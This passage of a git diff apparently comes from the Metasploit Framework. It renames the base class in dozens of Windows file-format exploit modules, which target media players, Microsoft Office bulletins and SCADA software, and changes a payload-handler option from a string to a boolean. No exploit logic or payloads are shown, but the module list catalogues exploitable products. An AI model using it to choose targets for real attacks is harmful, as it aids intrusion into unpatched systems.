< Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # ASLR+DEP bypass include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index 0d4f157193..4d4902d9a8 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 6e76f51aff..302377f25f 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb index 29df9fcdd0..335af1186d 100644 --- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb +++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index aebb884c39..4ef262a804 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb index 55699fcecf..846839bfb1 100644 --- a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb +++ b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb index 4bc326cf3c..844674afc7 100644 --- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb +++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lattice_pac_bof.rb b/modules/exploits/windows/fileformat/lattice_pac_bof.rb index 7af09b6327..5f3157ad99 100644 --- a/modules/exploits/windows/fileformat/lattice_pac_bof.rb +++ b/modules/exploits/windows/fileformat/lattice_pac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb index 2c46655a13..6b492c5605 100644 --- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb +++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index aaaa68e5e4..969b09a005 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index a210a5ddad..82e78e7f6c 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 41af41ef90..ef37f52edf 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'EXITFUNC' => "none", #'InitialAutoRunScript' => 'migrate -f', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/mediacoder_m3u.rb b/modules/exploits/windows/fileformat/mediacoder_m3u.rb index 9a91b041e3..63947ef024 100644 --- a/modules/exploits/windows/fileformat/mediacoder_m3u.rb +++ b/modules/exploits/windows/fileformat/mediacoder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index e6bf891a76..a3b275d5b2 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index d2b6298122..c8fc52c28c 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index aaa749cc1f..1df34cf54e 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 45c708b636..c6ce8282a9 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 06133dcc58..08d32e4615 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index 95dff30b96..b5290628b1 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index b1d56c8738..abca8b0b9a 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb index 5565d239b8..74a36749a5 100644 --- a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 563806e43f..2227ed7907 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 01127ad7e2..8e0efe9bee 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index 3e903cfb6a..ac9a801ea0 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index c38c4f6694..54346b5033 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb index 1a7ec7195a..cf2cc7d1fd 100644 --- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index a0786b7cfc..24283fda76 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/ole' require 'rex/ole/util' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 7e68750c0f..485b6ba9d9 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index be1f865651..6495b396d2 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote end =begin -mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c +mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c 1c1 < void *__thiscall CPackage::_GetCurrentIcon(void *this, int a2) --- diff --git a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb index 52709c9794..1548ef7a32 100644 --- a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb +++ b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index e524c4a34b..f2d966c158 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/ms14_017_rtf.rb b/modules/exploits/windows/fileformat/ms14_017_rtf.rb index 178fd02774..aba2907db5 100644 --- a/modules/exploits/windows/fileformat/ms14_017_rtf.rb +++ b/modules/exploits/windows/fileformat/ms14_017_rtf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb index 12a76d2f09..c68ecb9be7 100644 --- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb +++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index da08b259a5..70879a135d 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb index 2fae749a3d..34e74d6c31 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index 66df942f10..48157af3b3 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index 9815d96b34..0c5fd421fe 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index f0b5395668..d6f086132f 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 3715060fab..772cf9a59f 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -25,7 +25,7 @@ end end -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 91ec7bd6be..33887dd6e5 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index 2de0c93213..e73e8a6b3a 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb index a16320bc27..f89cbd3663 100644 --- a/modules/exploits/windows/fileformat/netop.rb +++ b/modules/exploits/windows/fileformat/netop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index 076e614bb2..fa46dcbcae 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/openoffice_ole.rb b/modules/exploits/windows/fileformat/openoffice_ole.rb index ad26ef2fbd..85aaa1f5b8 100644 --- a/modules/exploits/windows/fileformat/openoffice_ole.rb +++ b/modules/exploits/windows/fileformat/openoffice_ole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 75ed8cc4d3..17350e5db9 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index dd958d8620..ba23f01b14 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb index 202fb38aba..d17be93da7 100644 --- a/modules/exploits/windows/fileformat/ovf_format_string.rb +++ b/modules/exploits/windows/fileformat/ovf_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index fdd269942b..0c1416eb54 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_load_bof.rb b/modules/exploits/windows/fileformat/proshow_load_bof.rb index 7b5f803269..39a26a3059 100644 --- a/modules/exploits/windows/fileformat/proshow_load_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_load_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/publishit_pui.rb b/modules/exploits/windows/fileformat/publishit_pui.rb index 6a260b10df..a77cd17b8e 100644 --- a/modules/exploits/windows/fileformat/publishit_pui.rb +++ b/modules/exploits/windows/fileformat/publishit_pui.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 0c922c9fd1..f39244cd4e 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb index 861ac3d898..04f4942631 100644 --- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb index c3012abef6..03a9a8ad81 100644 --- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb +++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 51179b1675..65584db42e 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 7dcc8d9617..49acb4a06d 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 23358f9ad6..037ec684f9 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb index a4676e030b..cb0f20199f 100644 --- a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb +++ 